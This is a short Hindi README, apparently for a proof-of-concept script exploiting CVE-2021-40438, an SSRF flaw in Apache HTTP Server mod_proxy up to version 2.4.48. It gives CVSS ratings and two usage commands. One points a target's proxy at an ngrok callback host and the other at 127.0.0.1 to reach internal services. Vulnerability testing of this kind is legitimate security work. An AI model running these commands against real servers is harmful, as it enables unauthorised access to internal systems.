
CVE-2021-40438 Apache <= 2.4.48 SSRF एक्सप्लॉइट
एक क्राफ्टेड अनुरोध uri-path mod_proxy को रिमोट उपयोगकर्ता द्वारा चुने गए मूल सर्वर पर अनुरोध अग्रेषित करने का कारण बन सकता है। यह समस्या Apache HTTP Server 2.4.48 और उससे पहले के संस्करणों को प्रभावित करती है।
आधार स्कोर: 9.0 गंभीरता: CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
हमला वेक्टर: नेटवर्क हमला जटिलता: उच्च आवश्यक विशेषाधिकार: कोई नहीं उपयोगकर्ता सहभागिता: कोई नहीं दायरा: परिवर्तित गोपनीयता: उच्च अखंडता: उच्च उपलब्धता: उच्च
भेद्यता श्रेणी: सर्वर-साइड अनुरोध जालसाजी (SSRF)
यह स्क्रिप्ट दिए गए URLs के साथ HTTP GET अनुरोध करने के लिए requests लाइब्रेरी का उपयोग करती है। आप स्क्रिप्ट को कमांड लाइन से चला सकते हैं, URLs को अनुकूलित करने के लिए -t और -ssrf विकल्प निर्दिष्ट करते हुए।
आप अपने लोकल पोर्ट खोलने के बजाय ngrok को लोकल वेबहुक के रूप में उपयोग कर सकते हैं, या इंटरनेट से पब्लिक वेबहुक का उपयोग कर सकते हैं।
python3 CVE-2021-40438.py -t https://target.com -ssrf https://cf92-88-26-100-207.ngrok-free.app/ssrf
python3 CVE-2021-40438.py -t https://target.com -ssrf http://127.0.0.1
स्क्रिप्ट चलाने से पहले सुनिश्चित करें कि आपके पास requests लाइब्रेरी स्थापित है। आप इसे निम्न कमांड से स्थापित कर सकते हैं:
pip install requests